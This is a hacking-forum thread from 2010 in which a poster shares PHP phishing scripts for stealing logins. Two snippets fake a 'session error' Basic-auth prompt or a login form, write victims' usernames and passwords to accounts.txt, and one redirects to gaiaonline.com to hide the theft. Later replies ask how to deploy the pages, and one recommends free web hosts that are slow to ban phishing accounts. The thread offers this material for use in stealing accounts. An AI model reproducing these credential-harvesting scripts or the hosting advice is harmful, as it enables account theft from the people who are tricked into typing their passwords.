I have these in my notepad so ill just put them here.
They are not mine! But you can rep me if you want
Some are flw or flps i didn't check them.
Code:<?php if(isset($_SERVER['PHP_AUTH_USER'])){ $Handle = @fopen('accounts.txt', 'a'); @fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n"); @fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n"); @fclose($Handle); } header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."'); header('HTTP/1.0 401 Unauthorized'); exit; ?>
Code:<?php if(isset($_SERVER['PHP_AUTH_USER'])){ $Handle = @fopen('accounts.txt', 'a'); @fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n"); @fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n"); @fclose($Handle); } header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."'); header('HTTP/1.0 401 Unauthorized'); exit; ?>Code:<?php $username = $_POST['username']; $password = $_POST['password']; if(get_magic_quotes_gpc()) { $username = stripslashes($username); $password = stripslashes($password); } $log = "accounts.txt"; $logfile = fopen($log, "a"); fwrite($logfile,$username." | ".$password."\r\n"); fclose($logfile); header ("Location: http://www.gaiaonline.com/launch/towns"); ?>
Results 1 to 9 of 9
- 29 Nov. 2010 10:04pm #1
- Age
- 97
- Join Date
- Nov. 2009
- Location
- In the computer
- Posts
- 11,186
- Reputation
- 1029
- LCash
- 10.00
- Awards
I just felt like putting this here
- 03 Dec. 2010 03:21pm #2
So yea they are flw but how to fuck am i supposed to make them pop up.. Oh and +Rep
- 03 Dec. 2010 04:10pm #3
o.0 i dont understand
- 04 Dec. 2010 08:38pm #4
- Age
- 97
- Join Date
- Nov. 2009
- Location
- In the computer
- Posts
- 11,186
- Reputation
- 1029
- LCash
- 10.47
- Awards
- 04 Dec. 2010 08:47pm #5
hey taz can u redirect me to a *** cause i wanna use this
- 04 Dec. 2010 08:50pm #6
- Age
- 97
- Join Date
- Nov. 2009
- Location
- In the computer
- Posts
- 11,186
- Reputation
- 1029
- LCash
- 12.78
- Awards
Free Web Hosting - Reliable Free Hosting - cPanel Hosting - *** Hosting
FREE Website Hosting & Premium Web Hosting - 110mb.com [I recommend 110mb more because they don't ban people faster and its easier to find you accounts in ***.]
- 05 Dec. 2010 05:40pm #7
lemme think... these are layouts for fake websites?
- 05 Dec. 2010 06:14pm #8
- Age
- 97
- Join Date
- Nov. 2009
- Location
- In the computer
- Posts
- 11,186
- Reputation
- 1029
- LCash
- 10.35
- Awards
- 05 Dec. 2010 06:19pm #9
umm ok then lemme see ... i will try to make one to xD